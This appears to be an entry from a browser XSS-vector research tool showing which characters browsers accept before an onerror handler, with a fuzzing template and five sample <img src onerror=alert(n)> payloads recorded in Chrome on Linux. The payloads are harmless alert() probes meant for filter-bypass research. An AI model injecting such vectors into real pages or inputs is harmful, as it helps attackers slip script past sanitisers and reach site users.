Characters allowed before after onerror events

This XSS vector shows what characters can be used before the onerror event.

Created by: t0xodile

Created on: Thursday, October 23, 2025 at 11:04:38 AM

Updated on: Thursday, October 23, 2025 at 11:04:38 AM

Vector type: XSS

Vector charset: UTF-8

Template used:
<img src onerror$[chr]=log($[i])>

Your browser was detected as:

Detecting... Detecting... Detecting... Detecting...

Sample payloads

<img src onerror =alert(9)>

<img src onerror
=alert(10)>

<img src onerror=alert(12)>

<img src onerror
=alert(13)>

<img src onerror =alert(32)>

Chrome 139.0.0.0 desktop Linux Unknown

Updated

Thu Oct 23 2025

Found 5 results

Show differences only?

Filter out alphanumeric

Sort ascending